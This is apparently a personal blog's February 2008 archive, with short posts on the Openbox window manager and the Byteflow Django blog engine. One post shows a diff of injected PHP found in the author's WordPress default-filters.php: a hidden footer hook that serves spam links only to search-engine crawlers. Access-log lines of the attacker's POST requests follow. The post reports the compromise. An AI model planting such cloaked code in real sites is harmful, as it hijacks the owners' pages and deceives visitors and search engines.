Archive for February, 2008

Openbox

My new favorite window manager! Its like a perfect blend of fluxbox and xfce4. :-)

TODO:
* Install industrial-cursor-theme
* Figure out desktop key bindings for fast workspace switching
* Use feh in set background - check

Helpful:
* https://help.ubuntu.com/community/Openbox

Byteflow: A blog engine written in Python using the Djanjo framework

I installed byteflow last night, and although I had some issues with url mapping, I finally got it to work. Its pretty cool - very much all about django, which is something I’ve been meaning to examine.

I posted a comment to Command Line Warriors but got rejected:

I finally tried out django with the byteflow blog engine. So far it seems logical. Now I’m going to start combing the code…

Openbox




This looks like a very cool project:

http://icculus.org/openbox/index.php/Main_Page

Its a *box (lightweight, minimal) window manager, with compatibility with GNOME and KDE applications. Can’t wait to try it out!

wpc7c16b8466d864eeefd20050625c7775

--- default-filters.php (revision 6)
+++ default-filters.php (working copy)
@@ -42,6 +42,26 @@

 add_filter('comment_flood_filter', 'wp_throttle_comment_flood', 10, 3);

+
+add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
+function wpc7c16b8466d864eeefd20050625c7775() {
+       $seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol");
+       $sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; }
+       if(!($sebot==1 && sizeof($_COOKIE)==0)) return;
+       @include('./wp-includes/class-mail.php');
+       if(sizeof($wparr)>0){
+               shuffle($wparr);
+               echo "
“; + foreach($wparr as $k=>$v){ + echo ““.ucwords($v[’key’]).”\n”; + if($i++==$inum) break; + } + echo “
“.$_footer; + } +} + + +

Bad news. Who is responsible?

www.infonomix.org 194.110.162.23 [25/Feb/2008:07:21:06 -0500] "POST /blog/wp-includes/default-filters.php?970a0ddc6270e0ca=178d4b7fa8fc73a4 HTTP/1.1" 200 179
www.infonomix.org 194.110.162.23 [25/Feb/2008:07:21:07 -0500] "POST /blog/ HTTP/1.1" 200 27176